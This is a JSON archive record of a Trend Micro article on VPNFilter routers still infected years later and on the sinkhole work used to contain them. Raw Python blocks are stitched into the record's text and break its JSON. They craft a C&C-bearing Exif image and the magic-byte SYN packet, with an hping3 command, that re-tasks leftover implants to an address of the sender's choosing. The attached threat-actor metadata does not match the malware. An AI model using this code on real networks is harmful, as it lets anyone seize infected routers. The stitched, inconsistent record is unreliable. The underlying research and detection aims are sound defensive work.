{
	"id": "04ac250d-b67c-43bd-841c-37e426ec48fc",
	"created_at": "2026-04-06T00:18:39.02379Z",
	"updated_at": "2026-04-10T13:11:52.77461Z",
	"deleted_at": null,
	"sha1_hash": "f8b45386326d6e9a08259bb7053b3a53a2ba6cf7",
	"title": "VPNFilter Two Years Later: Routers Still Compromised",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1837787,
	"plain_text": "VPNFilter Two Years Later: Routers Still Compromised\r\nBy: Stephen Hilt, Fernando Merces, Jan 19, 2021. Read time: 12 min (3280 words)\r\nPublished: 2021-01-19 · Archived: 2026-04-02 12:11:47 UTC\r\nIoT\r\nWe look into VPNFilter, an IoT botnet discovered over two years ago, to see why there are still routers infected by the malware and what else can be done to minimize its potential risks.\r\nWith the internet of things (IoT) gaining more popularity, common IoT devices such as routers, printers, cameras, and network-attached storage (NAS) devices are becoming more frequent targets for cybercriminals. Compared with typical operating systems such as Windows and macOS, IoT devices are much less likely to be patched by their users. The task is more difficult and inconvenient: the operating systems of these devices usually have no auto-update feature, and some manufacturers rarely issue security updates at all. These are the kinds of systems that users log on to once to set them up and then never again, unless they encounter a big problem. It is also not rare to find an outdated router, one that has been running for as long as the system it serves.\r\nAs a result, many systems are left wide open to known vulnerabilities, which can lead to successful attacks even years after the first infection. While looking at these types of infections by known malware families, we found that one of the biggest reported malware families was 2018’s VPNFilter.\r\nVPNFilter is a malware family that affects routers and storage devices by using backdoor accounts and exploits for the products of several known vendors. In May 2018, Cisco Talos released the first report on the malware, which showed how VPNFilter was designed to gain a foothold into networks and look for Modbus traffic. 
However, it should be noted that the Modbus component was not the only plug-in but merely one of several plug-ins that could be deployed. Modbus is a popular industrial control system (ICS) communication protocol that is specific to these types of systems. While the malware tends to focus on compromising consumer-grade IoT devices, consumer devices are often found as part of ICS systems for various reasons: they are easy to deploy, they provide remote vendor access, or they were simply added by mistake by the administrator. That the malware potentially targets control systems could be the reason that the FBI attributed the first reported attack to the work of nation-state actors.\r\nVPNFilter operates in multiple stages: initial infection, command-and-control (C\u0026C) communications, and a third stage in which the payloads are deployed. These payloads perform the tasks that the malware is intended to do, and this is also where the Modbus portion of the malware is found. The first stage gains access to specific devices from over 12 vendors and then locates the server for the second stage. To do so, it first attempts to connect to Photobucket, an image-hosting site, to download an image that has the IP address of the C\u0026C server embedded in the GPS coordinates of its exchangeable image file format (Exif) metadata. If this fails, it tries to reach the domain toknowall[.]com to download an image with the C\u0026C server likewise embedded in the file. Finally, if both attempts fail, it opens a listener that monitors all incoming packets for a specially crafted TCP packet containing the IP address of the C\u0026C server.\r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 1 of 12\r\nFigure 1. 
VPNFilter’s operation and stages based on Cisco Talos’ report\r\nWhile VPNFilter gained considerable attention and became a threat when it was first discovered, this happened back in 2018, and several mitigation measures have since rendered VPNFilter essentially offline. With the domain seizures and every other action taken to stop the malware, it is worth asking why there are still infections out there. The FBI’s statement at the time of the malware’s discovery advised users to restart potentially affected devices to temporarily disrupt the malware. Based on the initial findings from Cisco Talos, restarting the router would remove any current second-stage and third-stage malware, since those stages do not persist across a reboot. However, this leaves a leftover infection: the first stage survives, together with the listener it sets up.\r\nIn our recent paper titled “Worm War: The Botnet Battle for IoT Territory,” we covered botnets removing the infections of other botnets and the ease with which these IoT devices can be compromised. At times, it seems that threat actors are among the few people who have access to some of these systems and are the ones removing malware types like VPNFilter. It is worth noting that this kind of access might not be available to all users in the first place. As an example, when the FBI took down part of the botnet’s network infrastructure, they recommended that end users restart their devices. However, many users have routers that were provided by their ISP, and such users often do not have login access to the router. As a result, without their ISP’s permission, they cannot update the firmware to get the latest vulnerability fixes. 
As we will discuss here, this is precisely the reason that the FBI worked with Shadowserver to add the extra safeguard of sinkholing the botnet. Still, we did find examples where vendors published updates and guidance to remediate the infection. Netgear and MikroTik, for instance, have stated that upgrading the firmware would remediate the malware’s effects and prevent further infections.\r\nAs of writing, however, we have not encountered any one organization in the IoT space that has committed to cleaning up vulnerabilities and infections. Due to the lack of a standard group or mechanism for updates, the owners of these IoT devices often need to manually go to their vendor’s website, download a firmware file, and then upload it to the device. Very few seem to have automatic firmware update procedures in place. These observations spurred us to ask the following questions with regard to the remaining VPNFilter infections:\r\n    How many victims have updated their router’s firmware?\r\n    How many victims have had their infected routers replaced in the last two years?\r\n    Was VPNFilter one of the infections being removed by other malware actors?\r\n    Are there any infected devices still out there?\r\nShadowserver Sinkhole\r\nThe Shadowserver Foundation is a nonprofit security organization whose mission is to \"... make the Internet more secure by bringing to light vulnerabilities, malicious activity and emerging threats.\" Recently, Trend Micro has partnered with Shadowserver to provide funding for their cause over the next three years. 
Given this partnership and the work that Cisco Talos, the FBI, and the US Department of Justice (with the support of Shadowserver) had already done to sinkhole VPNFilter’s second domain (toknowall[.]com), we wanted to work with Shadowserver to collect whatever statistics they had available, such as how many infections are still out there. We also wanted to suggest ways to clean up any leftover VPNFilter infections. This is of particular importance, as cleaning these devices is far from trivial for end users, which is precisely why it was so important for these organizations to carry out the sinkhole in the first place.\r\nFirst, we needed to get a better understanding of the malware, find out how it worked, and from there determine whether anything else could be added to the takedown processes that were already in place.\r\nFigure 2. The number of requests since the sinkhole of toknowall[.]com started, as provided by Shadowserver\r\nAs shown in the image above, when Shadowserver started the sinkhole, they saw an initial spike of over 14,000 infected networks in the first two months; over time, that has been reduced to 5,447. This shows that even after more than two years, a sizeable number of infections remains. Most notably, at this rate, the infections will likely still be around for years to come, until perhaps these devices are physically swapped out, a common trend in IoT botnets. Not only does this tie to our main point that IoT botnets are to some degree nearly “uncleanable,” it also makes VPNFilter a botnet that is ripe for takeover by another threat actor, as we will explain later on.\r\nFigure 3. 
Breakdown of the remaining infections by country\r\nTechnical details\r\nAs stated in the original publication by Cisco Talos, the first stage seeks to download the second-stage malware from an IP address obtained using the following scheme:\r\n1. Get the second-stage server’s IP address from an image file uploaded to Photobucket[.]com.\r\n2. If the above fails, try to download the image from the domain toknowall[.]com.\r\n3. If both fail, start listening to all TCP packets on the affected device to receive the IP address from a specific TCP packet sent by the attacker.\r\nThis logic is presented in Figure 4.\r\nFigure 4. The order of VPNFilter’s first stage to get the second stage server\r\nWe wanted to verify the effectiveness of the solutions against the first and second phases of the first stage. Mainly, this means that to see how effective the sinkhole is, it is necessary to check for victims that are still infected, and if there are any, to think of a solution to permanently clean up these devices.\r\nOne key thing that we discovered from the outset was that even though the first phase (the image on Photobucket) was already taken down and the second phase (the alternative domain) sinkholed, unless the malware receives a valid image file from the sinkhole, it still enters its third phase, where attackers could potentially regain control. Ironically, while this might seem like bad news, it showed us an opening for a solution, as we will discuss later on. Here we detail our findings on the first and second phases of this initial stage.\r\nPhotobucket[.]com C\u0026C\r\nAll the URLs pointing to Photobucket[.]com were already taken down, which means that the pictures hosted there were also removed. 
Therefore, the only two remaining options for currently infected devices are to reach out to toknowall[.]com or to start listening to TCP packets while expecting a specially crafted packet containing the IP address of the second-stage server. For our next step, we verified how many real victim devices were still communicating with the sinkhole and how many of these had already moved to listening mode.\r\ntoknowall[.]com C\u0026C\r\nWe then verified whether it would be possible to inject our own image with a C\u0026C IP address controlled by us, to see how many hosts would respond. For this, we had to dig deeper into the malware logic to see how it extracts the C\u0026C IP address from the image downloaded from either Photobucket[.]com or toknowall[.]com. The algorithm calculates each of the four octets of an IPv4 address out of the GPS information contained in the Exif header of the downloaded image file. The two values used are GPSLatitude and GPSLongitude. Each of these consists of three values (degrees, minutes, and seconds) stored as rationals (64-bit values split into two 32-bit integers: the first is the numerator and the second is the denominator). The theory behind this is better explained in Soufiane Tahiri’s book, “Mastering Mobile Forensics.” In the case of VPNFilter, these coordinates are used like this:\r\nFigure 5. How the IPv4 address of the second stage C\u0026C is formed based on the GPS coordinates of an image file\r\nAs can be seen from Figure 5, the denominator part of all coordinates is ignored by the malware. The numerator, however, is used to generate the values of all octets.\r\nWe wrote a program to replace these bytes in an image that we created. 
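The program the authors describe patches the numerators at a fixed file offset. As an added example (this is not the authors' code), the following Python instead walks the JPEG marker list and the Exif/TIFF IFDs to find GPSLatitude and GPSLongitude wherever they sit, reads the six numerators the malware consumes, and rewrites them in place without touching the denominators. It deliberately stops at the numerators: the octet derivation itself is the subject of Figure 5 and is not reproduced here. build_sample_jpeg constructs a minimal Exif-only file for testing; no real image is embedded, and the offsets inside it are chosen by this example alone.

```python
import struct

# Exif/TIFF constants: IFD0 points to the GPS IFD through tag 0x8825; the GPS IFD
# carries GPSLatitude (0x0002) and GPSLongitude (0x0004), each RATIONAL[3]
# (degrees, minutes, seconds; every rational is a 32-bit numerator then denominator).
TAG_GPS_IFD, TAG_GPS_LATITUDE, TAG_GPS_LONGITUDE = 0x8825, 0x0002, 0x0004
TYPE_LONG, TYPE_RATIONAL = 4, 5
GPS_TAGS = (('GPSLatitude', TAG_GPS_LATITUDE), ('GPSLongitude', TAG_GPS_LONGITUDE))


def locate_tiff(jpeg):
    # Walks the JPEG marker segments and returns the file offset of the TIFF header
    # inside the APP1/Exif segment.
    if jpeg[:2] != bytes.fromhex('ffd8'):
        raise ValueError('not a JPEG')
    pos = 2
    while pos + 4 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError('marker expected')
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):              # EOI / SOS: Exif must precede scan data
            break
        if 0xD0 <= marker <= 0xD8:              # RSTn / SOI carry no length field
            pos += 2
            continue
        length = struct.unpack_from('>H', jpeg, pos + 2)[0]
        if marker == 0xE1 and jpeg[pos + 4:pos + 10] == b'Exif' + bytes(2):
            return pos + 10
        pos += 2 + length
    raise ValueError('no Exif APP1 segment')


def read_ifd(buf, offset, order):
    # Returns {tag: (type, count, 4-byte value-or-offset field)} for one IFD.
    entries = {}
    for i in range(struct.unpack_from(order + 'H', buf, offset)[0]):
        pos = offset + 2 + 12 * i
        tag, typ, n = struct.unpack_from(order + 'HHI', buf, pos)
        entries[tag] = (typ, n, buf[pos + 8:pos + 12])
    return entries


def gps_rational_offsets(jpeg):
    # File offsets of the first (numerator, denominator) pair for latitude and for
    # longitude, plus the byte order of the TIFF block ('II' little, 'MM' big).
    base = locate_tiff(jpeg)
    order = {b'II': '<', b'MM': '>'}.get(jpeg[base:base + 2])
    if order is None:
        raise ValueError('bad TIFF byte order')
    ifd0 = base + struct.unpack_from(order + 'I', jpeg, base + 4)[0]
    entries = read_ifd(jpeg, ifd0, order)
    if TAG_GPS_IFD not in entries:
        raise ValueError('no GPS IFD')
    gps = read_ifd(jpeg, base + struct.unpack(order + 'I', entries[TAG_GPS_IFD][2])[0], order)
    out = {'order': order}
    for name, tag in GPS_TAGS:
        typ, n, raw = gps.get(tag, (None, None, None))
        if typ != TYPE_RATIONAL or n != 3:
            raise ValueError(name + ' missing or not RATIONAL[3]')
        out[name] = base + struct.unpack(order + 'I', raw)[0]     # 24 bytes never fit inline
    return out


def read_gps_rationals(jpeg):
    # The six (numerator, denominator) pairs: lat deg/min/sec, then lon deg/min/sec.
    info = gps_rational_offsets(jpeg)
    return [struct.unpack_from(info['order'] + 'II', jpeg, info[name] + 8 * k)
            for name, _ in GPS_TAGS for k in range(3)]


def read_gps_numerators(jpeg):
    # The six values the malware actually consumes; denominators are ignored, as the page notes.
    return [num for num, _ in read_gps_rationals(jpeg)]


def write_gps_numerators(jpeg, numerators):
    # Overwrites the six numerators in place, leaving denominators and everything else
    # untouched: an Exif-aware equivalent of patching the image at a fixed offset.
    if len(numerators) != 6:
        raise ValueError('six numerators expected')
    info = gps_rational_offsets(jpeg)
    out = bytearray(jpeg)
    for i, (name, _) in enumerate(GPS_TAGS):
        for k in range(3):
            struct.pack_into(info['order'] + 'I', out, info[name] + 8 * k, numerators[3 * i + k])
    return bytes(out)


def build_sample_jpeg(numerators, order='>'):
    # Constructed test input, not a real photo: SOI, one APP1/Exif segment (IFD0 holding
    # only the GPSInfo pointer, then a GPS IFD with the two tags and their data), EOI.
    ifd0_off, gps_ifd_off = 8, 8 + 2 + 12 + 4
    lat_off = gps_ifd_off + 2 + 2 * 12 + 4
    lon_off = lat_off + 24
    tiff = (b'MM' if order == '>' else b'II') + struct.pack(order + 'HI', 0x2A, ifd0_off)
    tiff += struct.pack(order + 'HHHIII', 1, TAG_GPS_IFD, TYPE_LONG, 1, gps_ifd_off, 0)
    tiff += struct.pack(order + 'HHHIIHHIII', 2, TAG_GPS_LATITUDE, TYPE_RATIONAL, 3, lat_off,
                        TAG_GPS_LONGITUDE, TYPE_RATIONAL, 3, lon_off, 0)
    for n in numerators:
        tiff += struct.pack(order + 'II', n, 1)          # denominator 1, ignored by the malware
    app1 = b'Exif' + bytes(2) + tiff
    return bytes.fromhex('ffd8ffe1') + struct.pack('>H', len(app1) + 2) + app1 + bytes.fromhex('ffd9')
```

Byte order is the detail a fixed-offset patcher gets wrong on a different source image: a TIFF block may be little-endian ('II') or big-endian ('MM'), and each rational is two separate 32-bit words in that order, so the numerator is always the first word but its byte layout follows the header. Resolving the tag through IFD0 and the GPS IFD also means the same code works whether the GPS block sits at offset 4500 or anywhere else.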
The code that does the job can be seen in Figure 6.\r\nFigure 6. The source code for our program to write at a specific position of an image file\r\nIn the preceding code, the first coordinate is located at offset 4500 (decimal) in the image. We could have parsed the whole Exif header, but we needed something quicker. Also, in lines 48 and 51, we set the numerator part of the degree value for both latitude and longitude to zero so that we could leverage negative integer values in C to write the exact bytes that we needed.\r\nBy using our program, we were able to inject an IP address that points back to the sinkhole owned by Shadowserver, both to see how many infected devices are still actively looking for a second-stage download server and, more importantly, to prevent the still-infected networks from moving to stage one’s third phase (listening to all TCP packets) in the future.\r\nFigure 7. The image developed containing the C\u0026C that we controlled.\r\nFigure 7 shows the resulting image that we used. This image was then supplied to Shadowserver, who are in the process of deploying it. While this was being done, we went to look for victims in a specific phase of the infection.\r\nListening mode\r\nIf the malware does not get a valid image from the previous phases, it enters listening mode. This allows the attackers to regain control over infected victims if the sinkholed alternative domain does not serve a valid image.\r\nFigure 8 shows the source code that makes this third option possible.\r\nFigure 8. 
VPNFilter’s listener from the first stage of the malware\r\nThe above code lets the malware listen to all packets and expects a single TCP packet with the SYN flag set that is at least 8 bytes long. The magic sequence expected is the hexadecimal bytes 0C 15 22 2B.\r\nFigure 9. The magic byte sequence in hexadecimal.\r\nAfter verifying the logic, our next step was to generate the packet. The easiest way that we could think of was to use hping3, since this tool is capable of sending arbitrary crafted network packets. We used the script seen in Figure 10.\r\nFigure 10. A Bash script that sends a specially crafted packet to a host\r\nWe then asked Shadowserver to scan the infected devices that they had logged throughout the years to see how many would respond. Here are the results for the 5,447 unique devices that were found still connecting to the sinkhole on a single day. It is important to remember that because these are routers and similar types of devices, this number also represents thousands of infected networks, not simply individual machines. This means that the reach and visibility for attackers with a botnet like this can be substantial. 
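The listener check described above (SYN flag set, at least 8 bytes, leading bytes 0C 15 22 2B) and the probe the authors sent with hping3, as an added Python example that is not the authors' script. build_ipv4_tcp crafts the raw IPv4/TCP packet the probe puts on the wire, match_trigger applies the listener's acceptance test to a raw packet and returns the embedded address, and scan_capture runs that test over a capture as a prototype detection rule. One assumption is labelled in the code and is not stated on the page: that the four magic bytes are immediately followed by the 4-byte C&C IPv4 address, which is what makes 8 bytes the minimum. All addresses are documentation ranges and all traffic is constructed.

```python
import ipaddress
import struct

# Magic bytes the stage-1 listener waits for, as given on the page: 0C 15 22 2B.
MAGIC = bytes.fromhex('0c15222b')
TCP_SYN = 0x02


def build_trigger_payload(c2_ip):
    # Assumption (not stated on the page): the 4 magic bytes are immediately followed by
    # the 4-byte C&C IPv4 address, giving exactly the 8-byte minimum the listener checks.
    return MAGIC + ipaddress.IPv4Address(c2_ip).packed


def ones_complement_sum(data):
    # RFC 1071 checksum over 16-bit words, used for both the IPv4 and the TCP header.
    if len(data) % 2:
        data += bytes(1)
    total = sum(struct.unpack('>%dH' % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_tcp(src_ip, dst_ip, sport, dport, flags, payload):
    # Raw IPv4 + TCP packet with no options, i.e. what a raw-socket listener sees.
    # Stands in for the hping3 probe the authors sent to TCP port 80.
    src = ipaddress.IPv4Address(src_ip).packed
    dst = ipaddress.IPv4Address(dst_ip).packed
    tcp = struct.pack('>HHIIBBHHH', sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0) + payload
    pseudo = src + dst + struct.pack('>BBH', 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack('>H', ones_complement_sum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack('>BBHHHBBH4s4s', 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0, src, dst)
    ip = ip[:10] + struct.pack('>H', ones_complement_sum(ip)) + ip[12:]
    return ip + tcp


def match_trigger(packet):
    # Mirrors the listener's acceptance test: IPv4, TCP, SYN set, at least 8 bytes of
    # data beginning with MAGIC. Returns the embedded IPv4 address as a string, else None.
    if len(packet) < 40 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 6 or len(packet) < ihl + 20:
        return None
    tcp = packet[ihl:]
    data = tcp[(tcp[12] >> 4) * 4:]
    if not tcp[13] & TCP_SYN:
        return None
    if len(data) < 8 or data[:4] != MAGIC:
        return None
    return str(ipaddress.IPv4Address(data[4:8]))


def scan_capture(packets):
    # Detection view: run the same check over a capture and report each match as
    # (packet index, source IP, embedded C&C IP). Anyone sending this is re-tasking implants.
    hits = []
    for i, pkt in enumerate(packets):
        c2 = match_trigger(pkt)
        if c2 is not None:
            hits.append((i, str(ipaddress.IPv4Address(pkt[12:16])), c2))
    return hits


if __name__ == '__main__':
    # Constructed sample traffic: an ordinary SYN, a trigger probe pointing the implant at a
    # hypothetical sinkhole address, and a SYN with 8 bytes of data but the wrong magic.
    probe = build_trigger_payload('192.0.2.10')
    capture = [
        build_ipv4_tcp('198.51.100.5', '203.0.113.1', 51000, 80, TCP_SYN, bytes(0)),
        build_ipv4_tcp('198.51.100.7', '203.0.113.1', 51001, 80, TCP_SYN, probe),
        build_ipv4_tcp('198.51.100.9', '203.0.113.1', 51002, 80, TCP_SYN, bytes(8)),
    ]
    for hit in scan_capture(capture):
        print('trigger packet %d from %s would redirect the implant to %s' % hit)
```

Putting a SYN with data on the wire still needs raw sockets or a tool such as hping3; with the 8-byte payload written to a file, one equivalent invocation is hping3 -S -p 80 -c 1 -d 8 -E trigger.bin TARGET, which sends a single SYN carrying the file contents. Because the listener accepts any SYN with the magic prefix, the same test turned into a capture filter on SYN segments whose payload starts with 0c15222b is a cheap way to notice when someone, including a new actor, is trying to re-task leftover implants on a network.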
Also, the number of infected hosts might be higher than what Shadowserver sees on their sinkhole, as the domain toknowall[.]com is a well-known C\u0026C and can be blocked at the DNS level by DNS providers or other security products.\r\nHere we summarize our main findings and show the geolocation data.\r\n    1,801 (33.1%) networks responded to our packet sent by hping3 on TCP port 80.\r\n    363 (6.7%) networks reached back to our sinkhole on TCP port 443.\r\n    Infections seem to be led by the USA, followed by Russia, according to geolocation data from the hosts that reached back to our sinkholed server.\r\nFigure 11. Hosts that parsed the packet and reached out to our sinkholed C\u0026C.\r\nAlthough only 363 networks connected back to our sinkhole, we cannot assume that the 1,801 networks that gave us an initial positive response are clean. They might still be infected by VPNFilter, with the connection to our sinkhole blocked by a firewall. These 363 networks can be taken over by anyone with an understanding of how the malware works. From a technical perspective, there was nothing to prevent the takeover of these devices. Additionally, at any point in time the original actors could take control of the devices that are already infected.\r\nConclusion and recommendations\r\nEven though solutions have been deployed to lower the effectiveness of VPNFilter (which has been known for over two years), for end users restarting is still not enough to protect their devices from reinfection. To reiterate, this is why the initial sinkhole was so important. While it is not likely that the malicious actor is still on infected systems, the malware can still have a potential negative impact. With just a bit of understanding, another malicious actor could reactivate the botnet. 
This is exactly why we worked with Shadowserver to upgrade the second-stage sinkhole with a valid image, to prevent the malware from moving forward to its listening mode, which is the third phase of the first stage.\r\nA firmware update would also remediate this problem. However, as mentioned earlier, firmware updates are problematic and, in most cases, not as easy as in PC ecosystems. The major hurdles involve verifying that the firmware file is legitimate and understanding how to apply the update to the system. This assumes, however, that users even have access to the router to perform upgrades in the first place, and that their device’s vendor has an upgrade available for their model. In many cases, someone else was responsible for setting up the device for the user, such as the company they bought it from or their ISP. To compound all of this, getting a new router might also be problematic if users do not own the router, as they might have to wait for their ISP to provide a new one.\r\nThese limitations and challenges faced by users bring us to where we are, and explain why the number of VPNFilter infections is still at the levels being seen on the internet. Moving forward, the approach is to keep the sinkhole running with the fixes that we have implemented. This limits the ability of this specific malware to become active again, and it gives time for devices to go offline naturally at the end of their normal life span. The need for such an approach emphasizes the importance of the existence and operations of organizations like Shadowserver, which serve as custodians of the internet. 
This is precisely why Trend Micro made the commitment earlier this year to support Shadowserver.\r\nOrdinary end users can also do their part in keeping the IoT out of the hands of cybercriminals, thereby preventing the success of their future campaigns. One of the best ways to minimize potential infection by IoT malware is to limit the number of services exposed to the internet. In most cases, this means disabling any remote management options in the configuration. Also, disable Universal Plug-and-Play (UPnP) if the option is available, as this setting might expose services to the internet without the user’s awareness. Updating devices to the latest firmware as regularly as needed also provides the latest security features and fixes for bugs that might otherwise be used in attacks against these systems.\r\nApplying general security practices can also minimize the chances of IoT malware infecting routers and other devices. At present, given the prolonged work-from-home (WFH) setups, users should reexamine their current security measures, as home devices and systems now have a heavier influence on corporate networks.\r\nIn our paper “Worm War: The Botnet Battle for IoT Territory,” we show how these devices are both actively attacked and relatively simple to compromise. We would now like to extend that message: these router infections are never cleaned and can remain active even years after a botnet has supposedly gone offline. Although we have used VPNFilter to elaborate, it is important to emphasize that this is true of any other IoT botnet. Indeed, this will keep happening unless users take care of their routers frequently and router manufacturers start adding auto-update features to their devices’ operating systems. 
In the meantime, the security industry faces an uphill battle against infections that cease to be a threat only when the router is finally replaced.\r\nSource: https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html"
	],
	"report_names": [
		"vpnfilter-two-years-later-routers-still-compromised-.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434719,
	"ts_updated_at": 1775826712,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f8b45386326d6e9a08259bb7053b3a53a2ba6cf7.pdf",
		"text": "https://archive.orkl.eu/f8b45386326d6e9a08259bb7053b3a53a2ba6cf7.txt",
		"img": "https://archive.orkl.eu/f8b45386326d6e9a08259bb7053b3a53a2ba6cf7.jpg"
	}
}